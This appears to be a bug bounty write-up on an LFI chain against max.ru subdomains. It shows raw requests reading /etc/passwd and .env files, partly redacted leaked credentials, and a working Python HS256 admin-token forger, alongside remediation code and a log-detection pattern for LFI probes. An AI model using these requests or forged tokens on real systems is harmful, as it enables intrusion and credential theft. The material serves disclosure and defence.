This is the story of how a seemingly simple Local File Inclusion (LFI) vulnerability escalated into a complete API and infrastructure compromise during a bug bounty engagement.
The vulnerability allowed me to retrieve sensitive configuration files from *.max.ru subdomains, extract credentials, forge authentication tokens, and ultimately access private APIs and source code repositories.
PoC Video: YouTube
Evidence & Full Report: Yandex Disk
1. Reconnaissance & Initial Finding
During reconnaissance of the max.ru domain, I focused on parameters likely to handle file input. Two subdomains stood out:
- business.max.ru
- help.max.ru
The file parameter behaved suspiciously. Testing with /etc/passwd returned actual system file contents, a classic LFI signature.
Example test:
GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*
Response (truncated):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
The parameter value was used as a filesystem path without any validation, so any file readable by the web server process could be retrieved.
2. Targeting High-Value Files
Once confirmed, I prioritized files with the highest potential impact:
File | Purpose | Potential Risk
---|---|---
.env | Environment variables | JWT secrets, DB creds, API keys
config.php | Application configuration | Database connection strings
.git/config | Git repo configuration | Repository URLs and tokens
/var/www/html/config/database.php | DB credentials | Full DB access
/proc/self/environ | Runtime env vars | Tokens in memory
Example request for .env:
GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*
Example response:
APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
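Triage of a leaked .env file, as an added Python example that is not part of the original report: it parses dotenv syntax (export prefixes, quotes, comments), flags entries that are credentials either by key name or by value shape, and redacts them so a finding can be written up without reprinting the secret. SAMPLE_ENV is a constructed stand-in for the response above; every value is a placeholder and the GitHub token merely has the classic ghp_ shape.

```python
import re

# Constructed sample modelled on the leaked .env above. Every value is a
# placeholder; the GitHub token only has the right shape (ghp_ + 36 chars).
SAMPLE_ENV = "\n".join([
    "# production settings",
    "APP_ENV=production",
    "export DB_HOST=db.example.internal",
    "DB_USER=max_prod",
    "DB_PASSWORD='placeholder-db-password'   # quoted, with trailing comment",
    'JWT_SECRET="placeholder-jwt-secret-value"',
    "GIT_TOKEN=ghp_" + "0" * 36,
    "ANALYTICS_KEY=not-a-real-key",
    "LOG_LEVEL=info",
])

# Key names that conventionally hold credentials.
SENSITIVE_KEY = re.compile(r"SECRET|PASS(WORD)?|TOKEN|API_?KEY|PRIVATE_KEY|_KEY$", re.I)

# Value shapes that identify a credential type whatever the key is called.
VALUE_FORMATS = {
    "github_pat_classic": re.compile(r"^ghp_[A-Za-z0-9]{36}$"),
    "github_pat_fine_grained": re.compile(r"^github_pat_[A-Za-z0-9_]{22,}$"),  # loose
    "aws_access_key_id": re.compile(r"^AKIA[0-9A-Z]{16}$"),
    "pem_private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def parse_dotenv(text):
    """Parse dotenv syntax: KEY=VALUE lines, optional 'export', comments, quotes."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if value[:1] in ('"', "'"):                 # quoted: take up to the closing quote
            quote = value[0]
            end = value.find(quote, 1)
            value = value[1:end] if end != -1 else value[1:]
        else:                                       # unquoted: drop a trailing comment
            value = value.split(" #", 1)[0].rstrip()
        env[key] = value
    return env


def classify_secrets(env):
    """Return [(key, kind)] for entries that must be treated as compromised,
    preferring a value-format match over a key-name match."""
    findings = []
    for key, value in env.items():
        kind = next((name for name, rx in VALUE_FORMATS.items() if rx.search(value)), None)
        if kind is None and SENSITIVE_KEY.search(key):
            kind = "credential_by_name"
        if kind is not None:
            findings.append((key, kind))
    return findings


def redact(value, keep=4):
    """Keep a short prefix so a report can identify a secret without reprinting it."""
    return value[:keep] + "..." if len(value) > keep else "***"


if __name__ == "__main__":
    env = parse_dotenv(SAMPLE_ENV)
    for key, kind in classify_secrets(env):
        print(f"{key:<14} {kind:<24} {redact(env[key])}")
```

The value-shape patterns matter because a token dropped into a key called something innocuous (LOG_LEVEL, DEPLOY_FLAG) would otherwise be missed; the key-name patterns catch the opposite case, a secret with no recognisable shape. Anything the classifier lists goes on the rotation list for the report.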
3. Secrets Obtained
The extracted configuration files revealed multiple high-value secrets:
- JWT_SECRET: used to sign and validate authentication tokens
- DB_USER / DB_PASSWORD: full database credentials
- GitHub Personal Access Token: R/W access to private repositories
- Third-party API keys: payment gateways, analytics, and internal tools
4. Exploiting the JWT_SECRET
JWT_SECRET is a shared secret used for both signing and validating tokens, so anyone who holds it can mint tokens the API cannot distinguish from its own. With it I could:
- Forge my own valid JSON Web Tokens
- Replay existing leaked tokens
- Impersonate any user, including administrators
PoC request using forged token:
curl -H "Authorization: Bearer forged_admin_token" \
https://api.oneme.ru/api/user
Result:
Private API endpoints accepted the forged token and returned data; no password or other credential was needed.
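The forging step, as an added example and not the original PoC: mint an HS256 token with the leaked secret, then check it exactly as a correct server-side verifier would. The HS256 algorithm, the claim names (sub, role, iat, exp) and the value of LEAKED_SECRET are assumptions; the report does not show the real token layout. Python's standard library is enough, since an HS256 JWT is just two base64url-encoded JSON documents and an HMAC-SHA256 over them.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed placeholder standing in for the leaked JWT_SECRET; not the real value.
LEAKED_SECRET = b"placeholder-jwt-secret-from-dotenv"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact_json(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def forge_jwt(secret: bytes, claims: dict) -> str:
    """Mint an HS256 token exactly as the server's own JWT library would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = _compact_json(header) + "." + _compact_json(claims)
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_jwt(secret: bytes, token: str, now: Optional[float] = None) -> Optional[dict]:
    """What a correct verifier does: pin the algorithm, compare the HMAC in
    constant time, enforce exp. Returns the claims, or None on any failure."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # refuse alg=none and algorithm-confusion tokens
        expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        claims = json.loads(b64url_decode(p))
        if not isinstance(claims, dict):
            return None
        current = time.time() if now is None else now
        if "exp" in claims and current >= claims["exp"]:
            return None
        return claims
    except (ValueError, TypeError):  # bad base64, bad JSON, wrong segment count
        return None


def forge_admin_token(secret: bytes, now: int) -> str:
    """The forged_admin_token from the PoC above. Claim names are assumed."""
    return forge_jwt(secret, {"sub": "1", "role": "admin", "iat": now, "exp": now + 3600})


if __name__ == "__main__":
    token = forge_admin_token(LEAKED_SECRET, int(time.time()))
    print(f'curl -H "Authorization: Bearer {token}" https://api.oneme.ru/api/user')
    print("verifies with leaked secret:", verify_jwt(LEAKED_SECRET, token) is not None)
    print("verifies after rotation:   ", verify_jwt(b"rotated-secret", token) is not None)
```

Two things the verifier makes visible: a forged token and a legitimate one are byte-for-byte the same kind of object, so no server-side check short of rotating the secret can tell them apart; and a replayed legitimate token stays valid until its exp, so rotation is the only remediation that kills both classes at once.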
5. Impact Analysis
The vulnerability chain enabled:
- Full API compromise: direct access to private endpoints
- Database breach: ability to dump, alter, or delete data
- Source code leak: private Git repos accessible with leaked tokens
- Lateral movement: potential pivot to other internal services
Risk mapping (MITRE ATT&CK):
- T1190: Exploit Public-Facing Application (the LFI itself)
- T1005: Data from Local System (reading /etc/passwd, .env and config files)
- T1552.001: Unsecured Credentials: Credentials In Files (.env and config.php contents)
- T1078: Valid Accounts (database and Git credentials)
- T1550.001: Use Alternate Authentication Material: Application Access Token (forged and replayed JWTs)
6. CVSS Scoring
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 10.0 (Critical), as given by the v3.1 base formula for this vector
Breakdown:
- AV:N: exploitable over the network, from the public internet
- AC:L: low attack complexity, a single unauthenticated GET request
- PR:N: no privileges required
- UI:N: no user interaction required
- S:C: scope change; the vulnerable web component exposes the API, the database and the Git repositories, which are separate security authorities
- C:H / I:H / A:H: high impact on confidentiality (credentials, source code), integrity (forged tokens, writable database and repositories) and availability (ability to delete data)
7. Recommendations
- Input Validation: never use the file parameter as a path. Map it through an allowlist of known page names, resolve the result under a fixed base directory, and reject absolute paths, traversal sequences (../ and its encoded variants) and NUL bytes.
- Access Controls: keep .env, .git and configuration files outside the web root, and deny them explicitly in the web server configuration as a second layer.
- Secret Management: remove production secrets from deployable code and inject them at runtime from a secrets manager. Note that /proc/self/environ is readable through the same LFI, so this does not replace the first fix.
- Token Rotation: immediately rotate the JWT secret, database password, Git token and third-party API keys after exposure. Rotating the JWT secret invalidates every issued token, which is the intent: forged and replayed tokens must stop working.
- Logging & Monitoring: alert on file-parameter values that contain absolute paths, traversal sequences or names such as .env and /proc/self/environ, and especially on 200 responses to such requests.
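The first and last recommendations, worked through as an added Python example rather than the target application's own code (which, judging by config.php, is PHP): the unsafe pattern behind the finding beside an allowlisted, path-contained resolver, and a scan over access-log lines for file= values that look like LFI probes. ALLOWED_PAGES, the log lines and the client IPs are constructed for the example.

```python
import os
import re
import tempfile

# Allowlist of pages the file= parameter may select (constructed for this example).
ALLOWED_PAGES = {"faq": "faq.html", "terms": "terms.html", "contact": "contact.html"}

# Values that are never legitimate for a page selector: absolute paths, traversal,
# encoded traversal, NUL bytes, and the high-value targets from the table above.
LFI_PROBE = re.compile(r"(^/|\.\./|\.\.\\|%2e%2e|%00|\x00|/proc/|/etc/|\.env\b|\.git\b)", re.I)


def resolve_page_unsafe(base_dir, file_param):
    """The pattern behind the finding: user input becomes a path as-is.
    os.path.join drops base_dir entirely when file_param is absolute."""
    return os.path.join(base_dir, file_param)


def resolve_page_safe(base_dir, file_param):
    """Map the parameter through an allowlist, then confirm the realpath stays
    under base_dir (guards against a symlinked or misconfigured allowlist entry)."""
    filename = ALLOWED_PAGES.get(file_param)
    if filename is None:
        raise PermissionError(f"page not allowed: {file_param!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("resolved path escapes the web root")
    return target


def suspicious_file_params(log_lines):
    """Flag (client_ip, file value) pairs whose file= value looks like an LFI probe."""
    hits = []
    for line in log_lines:
        m = re.search(r'[?&]file=([^ &"]+)', line)
        if m and LFI_PROBE.search(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


def demo_resolution(base_dir=None):
    """Exercise the safe resolver against a throwaway web root; returns outcomes."""
    base_dir = base_dir or tempfile.mkdtemp()
    with open(os.path.join(base_dir, "faq.html"), "w") as fh:
        fh.write("<h1>FAQ</h1>")
    outcomes = {}
    for param in ("faq", "/etc/passwd", "../../.env", "/proc/self/environ"):
        try:
            target = resolve_page_safe(base_dir, param)
            outcomes[param] = os.path.relpath(target, os.path.realpath(base_dir))
        except PermissionError as err:
            outcomes[param] = f"rejected: {err}"
    return outcomes


# Constructed access-log lines in combined-log style; IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /?file=faq HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /?file=/etc/passwd HTTP/1.1" 200 1420',
    '198.51.100.9 - - [01/Jan/2025:10:00:03 +0000] "GET /?file=../../../.env HTTP/1.1" 200 800',
    '203.0.113.7 - - [01/Jan/2025:10:00:04 +0000] "GET /?file=/proc/self/environ HTTP/1.1" 200 2300',
    '192.0.2.5 - - [01/Jan/2025:10:00:05 +0000] "GET /?file=terms&lang=en HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    print("unsafe:", resolve_page_unsafe("/var/www/html", "/etc/passwd"))
    for param, outcome in demo_resolution().items():
        print(f"safe {param!r}: {outcome}")
    for ip, value in suspicious_file_params(SAMPLE_LOG):
        print(f"LFI probe from {ip}: file={value}")
```

The allowlist is the actual fix; the realpath containment check is defence in depth for the day someone adds a symlink or an absolute path to the allowlist. The log scan is deliberately pattern-based rather than tied to one payload, so it also catches the encoded and NUL-byte variants an attacker tries when the plain form is blocked.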
8. Key Takeaways for Bug Hunters
- Never underestimate an LFI: the real impact is in what it reveals.
- .env and config.php are gold mines for credentials.
- JWT secrets are as sensitive as passwords; treat them accordingly.
- Git tokens can expose entire source codebases.
- Always think in terms of attack chains, not isolated bugs.
Keywords: LFI, Local File Inclusion, JWT Bypass, Token Replay, Auth Bypass, API Hack, Bug Bounty, Pentest, Web Security, CVSS 10.0, Security Research, Exploit
This case reinforces a core truth in offensive security:
A single weak link, if exploited fully, can unravel the entire security posture of an organization.